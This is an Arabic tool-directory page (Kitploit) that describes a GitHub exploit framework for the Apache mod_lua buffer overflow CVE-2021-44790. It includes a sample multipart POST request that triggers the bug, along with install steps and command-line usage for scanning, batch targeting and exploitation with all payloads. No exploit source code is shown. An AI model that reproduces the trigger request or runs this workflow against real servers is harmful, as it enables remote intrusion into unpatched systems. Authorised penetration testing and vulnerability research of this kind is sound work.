Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - إطار استغلال متقدم مع بصمات، فحص متعدد المراحل، بنية إضافات، تقارير احترافية، التقاط لقطات شاشة، قاعدة بيانات SQLite، واكتشاف بثقة تزيد عن 95%. المؤلف: Sudeepa Wanigarathna. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
ماسحات الثغرات الأمنية للويبأطر الاستغلالالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - إطار استغلال متقدم مع بصمات، فحص متعدد المراحل، بنية إضافات، تقارير احترافية، التقاط لقطات شاشة، قاعدة بيانات SQLite، واكتشاف بثقة تزيد عن 95%. المؤلف: Sudeepa Wanigarathna.

عرض المستودع
129منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 CVE-2021-44790 - استغلال تجاوز سعة المخزن المؤقت في Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 نظرة عامة

استغلال تجاوز سعة المخزن المؤقت في Apache mod_lua هو منصة استغلال متقدمة بمستوى المؤسسات لـ CVE-2021-44790 - وهي ثغرة حرجة من نوع تجاوز سعة المخزن المؤقت في وحدة mod_lua الخاصة بخادم Apache HTTP Server 2.4.x. يوفر هذا الإطار بصمة شاملة، واكتشافًا ذكيًا للنصوص البرمجية، ومسحًا متعدد المراحل، وقدرات إعداد تقارير احترافية مع دقة كشف تزيد عن 95%.

⚡ الميزات الرئيسية

الميزةالوصف
🔍 بصمة متقدمةكشف إصدار Apache، وmod_lua، ونظام التشغيل، والبنية، وWAF، وCDN، والحاوية، ومزود السحابة
🎯 اكتشاف ذكيأكثر من 7 تقنيات اكتشاف تشمل robots.txt وsitemap وتحميل HTML واستخراج JavaScript
💥 مسح متعدد المراحلاتصال ← بصمة ← اكتشاف ← تحقق ← استغلال ← إعداد تقارير
🧩 نظام إضافات قابل للتوسعةتطوير سهل للإضافات لثغرات CVE مستقبلية
🌐 محرك HTTP ذكيتجميع الاتصالات، وإعادة المحاولة، ودعم HTTP/2، وتحديد المعدل
📊 إعداد تقارير شاملJSON وHTML وMarkdown وPDF مع لوحات تحكم تفاعلية
🎨 واجهة طرفية جميلةمكتبة غنية بأشرطة تقدم وجداول ومخرجات ملونة
💾 قاعدة بيانات بحثيةتخزين SQLite مع سجل مسح كامل ودعم الاستعلامات
📸 التقاط لقطات الشاشةلقطات شاشة تلقائية لصفحات الويب لجمع الأدلة
🚀 أداء عالٍأكثر من 20 خيطًا متزامنًا وأكثر من 100 مجموعة اتصالات

🎯 تفاصيل الثغرة

السمةالقيمة
معرف CVECVE-2021-44790
الثغرةتجاوز سعة المخزن المؤقت (نقصان عددي صحيح)
البرنامج المتأثرApache HTTP Server من 2.4.0 حتى 2.4.51
الإصدار المُصَحَّحApache HTTP Server 2.4.52 والإصدارات الأحدث
المكوّنوحدة mod_lua
متجه الهجومالشبكة (عن بُعد)
درجة CVSS9.8 (حرجة)
تأثير السريةمرتفع
تأثير التكاملمرتفع
تأثير التوافرمرتفع
نضج الاستغلالإثبات المفهوم متاح

الوصف الفني

توجد الثغرة في وحدة mod_lua عند معالجة طلبات multipart/form-data. يمكن أن يؤدي نقصان عددي صحيح في دالة lua_request_parsebody() إلى تجاوز سعة مخزن مؤقت قائم على الكومة (heap)، مما قد يسمح بتنفيذ تعليمات برمجية عن بُعد.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 لقطات الشاشة

الواجهة الرئيسيةنتائج البصمة
تقدم المسحلوحة تحكم تقرير HTML

🚀 بدء سريع

التثبيت

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

الاستخدام الأساسي

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 الاستخدام المفصّل

خيارات سطر الأوامر

python3 exploit.py [TARGET] [OPTIONS]
الخيارالوصفمثال
TARGETرابط URL للهدفhttp://target.com
--config FILEملف الإعدادات--config config.yaml
--threads Nعدد الخيوط--threads 30
--timeout Nمهلة الطلب (بالثواني)--timeout 15
--proxy URLرابط الوكيل (Proxy)--proxy http://127.0.0.1:8080
--verboseمخرجات تفصيلية--verbose
--scan-onlyمسح دون استغلال--scan-only
--exploitتفعيل الاستغلال--exploit
--all-payloadsاستخدام كل الحمولات--all-payloads
--report FORMATصيغة التقرير (json/html/markdown/all)--report all
--output DIRمجلد الإخراج--output /path/to/reports/
--researchتفعيل وضع البحث--research
--database FILEمسار قاعدة البيانات--database luastorm.db
--screenshotالتقاط لقطات شاشة--screenshot
--batch FILEملف دفعة يحتوي على الأهداف--batch targets.txt
--query SQLتنفيذ استعلام قاعدة البيانات--query "SELECT * FROM targets"

أمثلة

1. تقييم الثغرات الأساسي

python3 exploit.py https://example.com --verbose --report all

2. مسح بيئة الشركات

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. اختبار اختراق كامل

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. المسح الدفعي

python3 exploit.py --batch targets.txt --config config.yaml

5. استعلامات قاعدة البيانات

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ الإعدادات

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets
تنزيل الأداة